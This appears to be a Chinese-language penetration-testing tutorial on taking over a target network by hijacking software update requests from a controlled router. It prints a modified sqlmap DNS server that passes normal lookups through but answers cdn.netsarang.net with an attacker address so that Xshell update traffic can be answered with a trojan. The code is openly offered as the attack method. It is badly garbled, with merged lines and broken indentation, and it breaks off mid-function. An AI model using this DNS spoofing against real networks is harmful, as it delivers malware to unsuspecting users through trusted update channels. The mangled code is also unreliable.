很多時(shí)候?qū)δ繕?biāo)進(jìn)行滲透時(shí)一般會(huì)從web、網(wǎng)絡(luò)設(shè)備、針對(duì)性釣魚(yú)這三個(gè)方向入手。假設(shè)我們控制了目標(biāo)網(wǎng)絡(luò)中的一臺(tái)網(wǎng)絡(luò)設(shè)備，如路由器，內(nèi)網(wǎng)用戶(hù)流量會(huì)從這個(gè)地方經(jīng)過(guò)我們?cè)趺传@取其權(quán)限呢 ？
這種時(shí)候可以在路由器上抓包分析用戶(hù)流量，比如啟動(dòng)xshell、notepad++等軟件時(shí)發(fā)送的更新請(qǐng)求包，然后我們替換軟件更新的http響應(yīng)包達(dá)到植入木馬目的。
分析流量一般用tcpdump，如果只有路由器后臺(tái)權(quán)限沒(méi)有地方可以執(zhí)行命令的話可以用DNS服務(wù)器配合HTTP代理來(lái)截獲流量。

這里就演示一下去劫持軟件更新服務(wù)器達(dá)到植入木馬的目的

一、部署DNS服務(wù)器
為了方便演示這里將受害者機(jī)器上的DNS改為攻擊者IP

下載sqlmap項(xiàng)目提取sqlmap\sqlmap-stable\lib\request目錄中的dns.py
執(zhí)行看看效果

在用戶(hù)機(jī)器上ping了一下，DNS服務(wù)器這邊已經(jīng)成功接收域名解析請(qǐng)求并響應(yīng)127.0.0.1
但是這個(gè)腳本中把所有域名解析請(qǐng)求都響應(yīng)成127.0.0.1

需要修改一下
我們的需求是能夠正常解析域名，再對(duì)某些指定域名進(jìn)行劫持。
修改后代碼如下
#!/usr/bin/env python"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""import osimport reimport socketimport threadingimport timeimport dns.resolverclass DNSQuery(object):
    """
    Used for making fake DNS resolution responses based on received
    raw request
    Reference(s):
http://code.activestate.com/recipes/491264-mini-fake-dns-server/
https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
    """
    def __init__(self, raw):
        self._raw = raw
        self._query = ""
        type_ = (ord(raw[2]) >> 3) & 15                 # Opcode bits
        if type_ == 0:                                  # Standard query
            i = 12
            j = ord(raw[i])            while j != 0:
                self._query += raw[i + 1:i + j + 1] + '.'
                i = i + j + 1
                j = ord(raw[i])    def response(self, resolution):
        """
        Crafts raw DNS resolution response packet
        """
        retVal = ""
        if self._query:
            retVal += self._raw[:2]                                             # Transaction ID
            retVal += "\x85\x80"                                                # Flags (Standard query response, No error)         retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00"      # Questions and Answers Counts
            retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)]      # Original Domain Name Query
            retVal += "\xc0\x0c"                                                # Pointer to domain name
            retVal += "\x00\x01"                                                # Type A
            retVal += "\x00\x01"                                                # Class IN
            retVal += "\x00\x00\x00\x20"                                        # TTL (32 seconds)
            retVal += "\x00\x04"                                                # Data length
            retVal += "".join(chr(int(_)) for _ in resolution.split('.'))       # 4 bytes of IP
        return retValclass DNSServer(object):
    def __init__(self):
        self.my_resolver = dns.resolver.Resolver()
        self.my_resolver.nameservers = ['8.8.8.8']
        self._check_localhost()
        self._requests = []
        self._lock = threading.Lock()        try:
            self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM)        except AttributeError:
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._socket.bind(("", 53))
        self._running = False
        self._initialized = False
    def _check_localhost(self):
        response = ""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(("", 53))
            s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex"))  # A www.google.com
            response = s.recv(512)        except:            pass
        finally:            if response and "google" in response:                raise socket.error("another DNS service already running on *:53")    def pop(self, prefix=None, suffix=None): """
        Returns received DNS resolution request (if any) that has given
        prefix/suffix combination (e.g. prefix..suffix.domain)
        """
        retVal = None
        with self._lock:            for _ in self._requests:                if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):
                    retVal = _
                    self._requests.remove(_)                    break
        return retVal    def get_domain_A(self,domain):
        try:
            results=self.my_resolver.query(domain,'A')            for i in results.response.answer:                for j in i.items:                    try:
                        ip_address = j.address                        if re.match('\d+\.+\d+\.+\d+\.+\d', ip_address):                            return ip_address                    except AttributeError as e:                        continue
        except Exception as e:            return '127.0.0.1'
            
    def run(self):
        """
        Runs a DNSServer instance as a daemon thread (killed by program exit)
        """
        def _():
            try:
                self._running = True
                self._initialized = True
                while True:
                    data, addr = self._socket.recvfrom(1024)
                    _ = DNSQuery(data)
                    domain=_._query[:-1] ###### exploit
                    ip=self.get_domain_A(domain)                    if domain=='cdn.netsarang.net':
                        ip='192.168.80.142'
                    print domain,' -> ',ip
                    self._socket.sendto(_.response(ip), addr)                    with self._lock:
                        self._requests.append(_._query)            except KeyboardInterrupt:                raise